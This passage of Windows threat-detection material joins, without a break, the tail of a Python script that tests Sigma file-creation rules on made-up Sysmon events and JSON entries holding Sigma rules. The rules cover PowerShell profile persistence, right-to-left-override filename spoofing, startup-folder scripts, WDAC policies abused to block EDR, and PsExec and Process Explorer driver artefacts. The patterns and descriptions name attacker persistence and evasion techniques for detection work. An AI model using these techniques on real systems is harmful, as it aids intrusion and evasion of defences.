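                "Image|endswith": ["\\excel.exe", "\\powerpnt.exe", "\\winword.exe"],
                "TargetFilename|contains": "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\",
            },
            "filter_optional_office_excel": {"Image|endswith": "\\excel.exe", "TargetFilename|contains": "\\AppData\\Roaming\\Microsoft\\Excel"},
            "filter_optional_office_powerpoint": {"Image|endswith": "\\powerpnt.exe", "TargetFilename|contains": "\\AppData\\Roaming\\Microsoft\\PowerPoint"},
            "filter_optional_office_word": {"Image|endswith": "\\winword.exe", "TargetFilename|contains": "\\AppData\\Roaming\\Microsoft\\Word"},
        },
        # selection and not 1 of filter_main_* and not 1 of filter_optional_*
        "condition": lambda h: h["selection"] and not any_of(h, "filter_main_") and not any_of(h, "filter_optional_"),
    },
]


def matching_rules(event: dict) -> list:
    """Titles of the rules whose condition holds for one file-create event."""
    titles = []
    for rule in RULES:
        hits = {name: selection_matches(sel, event) for name, sel in rule["detection"].items()}
        if rule["condition"](hits):
            titles.append(rule["title"])
    return titles


# Constructed Sysmon Event ID 11 (FileCreate) records with only the fields the
# rules read. These are not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\Downloads\\Invoice_2024.pdf.exe"},
    {"Image": "C:\\Program Files\\7-Zip\\7zG.exe", "TargetFilename": "C:\\Users\\alice\\Downloads\\photos.zip.exe"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\report.docx"},
    {"Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\Desktop\\Salary.xlsx.lnk"},
    {"Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Salary.xlsx.lnk"},
    {"Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Excel\\Salary.xlsx.lnk"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Excel\\Salary.xlsx.lnk"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(matching_rules(ev) or "-", ev["TargetFilename"])
```

Events 0 and 1 alert on the first rule (1 via `selection_exe` only), 3 and 6 alert on the LNK rule, 4 is suppressed by `filter_main_recent`, 5 by `filter_optional_office_excel`, and 2 is clean.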
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml",
    "content": "title: PowerShell Profile Modification\nid: b5b78988-486d-4a80-b991-930eff3ff8bf\nstatus: test\ndescription: Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence\nreferences:\n    - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\n    - https://persistence-info.github.io/Data/powershellprofile.html\nauthor: HieuTT35, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-10-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\Microsoft.PowerShell_profile.ps1'\n            - '\\PowerShell\\profile.ps1'\n            - '\\Program Files\\PowerShell\\7-preview\\profile.ps1'\n            - '\\Program Files\\PowerShell\\7\\profile.ps1'\n            - '\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n            - '\\WindowsPowerShell\\profile.ps1'\n    condition: selection\nfalsepositives:\n    - System administrator creating a PowerShell profile manually\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml",
    "content": "title: Suspicious PROCEXP152.sys File Created In TMP\nid: 3da70954-0f2c-4103-adff-b7440368f50e\nstatus: test\ndescription: |\n  Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\n  This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\nreferences:\n    - https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2022-11-22\ntags:\n    - attack.t1562.001\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: 'PROCEXP152.sys'\n    filter:\n        Image|contains:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Other legitimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore the level is only medium; do not rely on it alone.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml",
    "content": "title: Suspicious Binaries and Scripts in Public Folder\nid: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e\nstatus: experimental\ndescription: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.\nreferences:\n    - https://intel.thedfirreport.com/events/view/30032 # Private Report\n    - https://intel.thedfirreport.com/eventReports/view/70 # Private Report\n    - https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\nauthor: 'The DFIR Report'\ndate: 2025-01-23\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Users\\Public\\'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Administrators deploying legitimate binaries to public folders.\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml",
    "content": "title: Suspicious File Creation Activity From Fake Recycle.Bin Folder\nid: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\nrelated:\n    - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0\n      type: derived\nstatus: test\ndescription: Detects file write events from or to a fake Recycle Bin folder, which is often used as a staging directory for malware\nreferences:\n    - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets\n    - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              # e.g. C:\\$RECYCLER.BIN\n              - 'RECYCLERS.BIN\\'\n              - 'RECYCLER.BIN\\'\n        - TargetFilename|contains:\n              # e.g. C:\\$RECYCLER.BIN\n              - 'RECYCLERS.BIN\\'\n              - 'RECYCLER.BIN\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml",
    "content": "title: Potential File Extension Spoofing Using Right-to-Left Override\nid: 979baf41-ca44-4540-9d0c-4fcef3b5a3a4\nrelated:\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3\n      type: derived\nstatus: test\ndescription: |\n    Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.\nreferences:\n    - https://redcanary.com/blog/right-to-left-override/\n    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\n    - https://tria.ge/241015-l98snsyeje/behavioral2\n    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\nauthor: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2024-11-17\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_rtlo_unicode:\n        TargetFilename|contains:\n            - '\\u202e'  # Unicode RTLO character\n            - '[U+202E]'\n    selection_extensions:\n        TargetFilename|contains:\n            - '3pm.'  # Reversed `.mp3`\n            - '4pm.'  # Reversed `.mp4`\n            - 'cod.'  # Reversed `.doc`\n            - 'fdp.'  # Reversed `.pdf`\n            - 'ftr.'  # Reversed `.rtf`\n            - 'gepj.'  # Reversed `.jpeg`\n            - 'gnp.'  # Reversed `.png`\n            - 'gpj.'  # Reversed `.jpg`\n            - 'ism.'  # Reversed `.msi`\n            - 'lmth.'  # Reversed `.html`\n            - 'nls.'  # Reversed `.sln`\n            - 'piz.'  # Reversed `.zip`\n            - 'slx.'  # Reversed `.xls`\n            - 'tdo.'  # Reversed `.odt`\n            - 'vsc.'  # Reversed `.csv`\n            - 'vwm.'  # Reversed `.wmv`\n            - 'xcod.'  # Reversed `.docx`\n            - 'xslx.'  # Reversed `.xlsx`\n            - 'xtpp.'  # Reversed `.pptx`\n    condition: all of selection_*\nfalsepositives:\n    - Filenames containing right-to-left scripts such as Arabic or Hebrew may legitimately include this character\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml",
    "content": "title: Drop Binaries Into Spool Drivers Color Folder\nid: ce7066a6-508a-42d3-995b-2952c65dc2ce\nstatus: test\ndescription: Detects the creation of suspicious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\spool\\drivers\\color\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n            - '.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml",
    "content": "title: Suspicious Startup Folder Persistence\nid: 28208707-fe31-437f-9a7f-4b1108b94d2e\nrelated:\n    - id: 2aa0a6b4-a865-495b-ab51-c28249537b75\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.\n    These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.\n    This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.\nreferences:\n    - https://github.com/last-byte/PersistenceSniper\n    - https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-08-10\nmodified: 2025-10-12\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1204.002\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Windows\\Start Menu\\Programs\\Startup\\'\n        TargetFilename|endswith:\n            # Add or remove suspicious extensions according to your env needs\n            - '.bat'\n            - '.cmd'\n            - '.dll'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.jse'\n            - '.msi'\n            - '.ps1'\n            - '.psd1'\n            - '.psm1'\n            - '.scr'\n            - '.url'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - Rare legitimate usage of some of the extensions mentioned in the rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml",
    "content": "title: Suspicious Interactive PowerShell as SYSTEM\nid: 5b40a734-99b6-4b98-a1d0-1cea51a08ab2\nstatus: test\ndescription: Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-07\nmodified: 2022-08-13\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename:\n            - 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt'\n            - 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive'\n    condition: selection\nfalsepositives:\n    - Administrative activity\n    - PowerShell scripts running as SYSTEM user\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_task_write.yml",
    "content": "title: Suspicious Scheduled Task Write to System32 Tasks\nid: 80e1f67a-4596-4351-98f5-a9c3efabac95\nstatus: test\ndescription: Detects the creation of tasks from processes executed from suspicious locations\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-16\nmodified: 2022-01-12\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Windows\\System32\\Tasks'\n        Image|contains:\n            - '\\AppData\\'\n            - 'C:\\PerfLogs'\n            - '\\Windows\\System32\\config\\systemprofile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml",
    "content": "title: TeamViewer Remote Session\nid: 162ab1e4-6874-4564-853c-53ec3ab8be01\nstatus: test\ndescription: Detects the creation of log files during a TeamViewer remote session\nreferences:\n    - https://www.teamviewer.com/en-us/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-30\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection1:\n        TargetFilename|endswith:\n            - '\\TeamViewer\\RemotePrinting\\tvprint.db'\n            - '\\TeamViewer\\TVNetwork.log'\n    selection2:\n        TargetFilename|contains|all:\n            - '\\TeamViewer'\n            - '_Logfile.log'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate uses of TeamViewer in an organisation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml",
    "content": "title: VsCode Powershell Profile Modification\nid: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502\nrelated:\n    - id: b5b78988-486d-4a80-b991-930eff3ff8bf\n      type: similar\nstatus: test\ndescription: Detects the creation or modification of a VSCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-01-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Microsoft.VSCode_profile.ps1'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the profile by developers or administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml",
    "content": "title: Potentially Suspicious WDAC Policy File Creation\nid: 1d2de8a6-4803-4fde-b85b-f58f3aa7a705\nstatus: experimental\ndescription: |\n    Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attackers to block EDR/AV components while allowing their own malicious code to run on the system.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy\n    - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n    - https://github.com/logangoins/Krueger/tree/main\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm\nauthor: X__Junior\ndate: 2025-02-07\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_target:\n        # This is a default location but unfortunately it could be any path configured in Group Policy Management Editor.\n        # No file extension needed because any extension would work, check first reference.\n        TargetFilename|contains: '\\Windows\\System32\\CodeIntegrity\\'\n    filter_main_images:\n        Image|endswith:\n            - '\\Microsoft.ConfigurationManagement.exe' # Replace with full path to avoid false negatives\n            - '\\WDAC Wizard.exe' # Replace with full path to avoid false negatives\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\dllhost.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\dllhost.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_cli:\n        - CommandLine|contains|all:\n              - 'ConvertFrom-CIPolicy -XmlFilePath'\n              - '-BinaryFilePath '\n        - CommandLine|contains: 'CiTool --update-policy'\n        - CommandLine|contains|all:\n              - 'Copy-Item -Path'\n              - '-Destination'\n    filter_main_system:\n        Image: 'System'\n    filter_main_wuauclt:\n        Image:\n            - 'C:\\Windows\\System32\\wuauclt.exe'\n            - 'C:\\Windows\\UUS\\arm64\\wuaucltcore.exe'\n    condition: selection_target and not 1 of filter_main_*\nfalsepositives:\n    - Administrators and security vendors could leverage WDAC, apply additional filters as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml",
    "content": "title: Windows Terminal Profile Settings Modification By Uncommon Process\nid: 9b64de98-9db3-4033-bd7a-f51430105f00\nstatus: test\ndescription: Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile\n    - https://twitter.com/nas_bench/status/1550836225652686848\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.015\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add other potential common applications\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        TargetFilename|endswith: '\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json'\n    condition: selection\nfalsepositives:\n    - Some false positives may occur with admin scripts that set WT settings.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml",
    "content": "title: WinSxS Executable File Creation By Non-System Process\nid: 34746e8c-5fb8-415a-b135-0abc167e912a\nrelated:\n    - id: 64827580-e4c3-4c64-97eb-c72325d45399\n      type: derived\nstatus: test\ndescription: Detects the creation of binaries in the WinSxS folder by non-system processes\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-11\ntags:\n    - attack.execution\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\WinSxS\\'\n        TargetFilename|endswith: '.exe'\n    filter_main_system_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_adexplorer_dump_written.yml",
    "content": "title: ADExplorer Writing Complete AD Snapshot Into .dat File\nid: 0a1255c5-d732-4b62-ac02-b5152d34fb83\nrelated:\n    - id: 9212f354-7775-4e28-9c9f-8f0a4544e664\n      type: similar\nstatus: experimental\ndescription: Detects the dual-use tool ADExplorer writing a complete AD snapshot into a .dat file. Attackers can use such a snapshot to extract data for BloodHound, collect usernames for password spraying or use the metadata for social engineering. The snapshot doesn't contain password hashes, but there have been cases where administrators put passwords in the comment field.\nreferences:\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Arnim Rupp (Nextron Systems), Thomas Patzke\ndate: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\ADExp.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\ADExplorer64a.exe'\n        TargetFilename|endswith: '.dat'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ADExplorer by administrators creating .dat snapshots\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml",
    "content": "title: LiveKD Kernel Memory Dump File Created\nid: 814ddeca-3d31-4265-8e07-8cc54fb44903\nstatus: test\ndescription: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\livekd.dmp'\n    condition: selection\nfalsepositives:\n    - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml",
    "content": "title: LiveKD Driver Creation\nid: 16fe46bb-4f64-46aa-817d-ff7bec4a2352\nstatus: test\ndescription: Detects the creation of the LiveKD driver, which is used for live kernel debugging\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\LiveKdD.SYS'\n        Image|endswith:\n            - '\\livekd.exe'\n            - '\\livek64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of LiveKD for debugging purposes will also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml",
    "content": "title: LiveKD Driver Creation By Uncommon Process\nid: 059c5af9-5131-4d8d-92b2-de4ad6146712\nrelated:\n    - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352\n      type: similar\nstatus: test\ndescription: Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\LiveKdD.SYS'\n    filter_main_legit_name:\n        Image|endswith:\n            - '\\livekd.exe'\n            - '\\livek64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml",
    "content": "title: Process Explorer Driver Creation By Non-Sysinternals Binary\nid: de46c52b-0bf8-4936-a327-aace94f94ac6\nstatus: test\ndescription: |\n    Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\n    Hack tools or malware may use the Process Explorer driver to elevate privileges: they drop it to disk for a few moments, run a service using that driver and remove it afterwards.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer\n    - https://github.com/Yaxser/Backstab\n    - https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\n    - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\PROCEXP'\n        TargetFilename|endswith: '.sys'\n    filter_main_process_explorer:\n        Image|endswith:\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur with legitimate renamed process explorer binaries\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml",
    "content": "title: Process Monitor Driver Creation By Non-Sysinternals Binary\nid: a05baa88-e922-4001-bc4d-8738135f27de\nstatus: test\ndescription: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\procmon'\n        TargetFilename|endswith: '.sys'\n    filter_main_process_explorer:\n        Image|endswith:\n            - '\\procmon.exe'\n            - '\\procmon64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur with legitimate renamed process monitor binaries\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml",
    "content": "title: PsExec Service File Creation\nid: 259e5a6a-b8d2-4c38-86e2-26c5e651361d\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: test\ndescription: Detects default PsExec service filename which indicates PsExec service installation and execution\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\PSEXESVC.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml",
    "content": "title: PSEXEC Remote Execution File Artefact\nid: 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4\nstatus: test\ndescription: Detects creation of the PSEXEC key file, which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system\nreferences:\n    - https://aboutdfir.com/the-key-to-identify-psexec/\n    - https://twitter.com/davisrichardg/status/1616518800584704028\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-21\nmodified: 2023-02-23\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1136.002\n    - attack.t1543.003\n    - attack.t1570\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\PSEXEC-'\n        TargetFilename|endswith: '.key'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml",
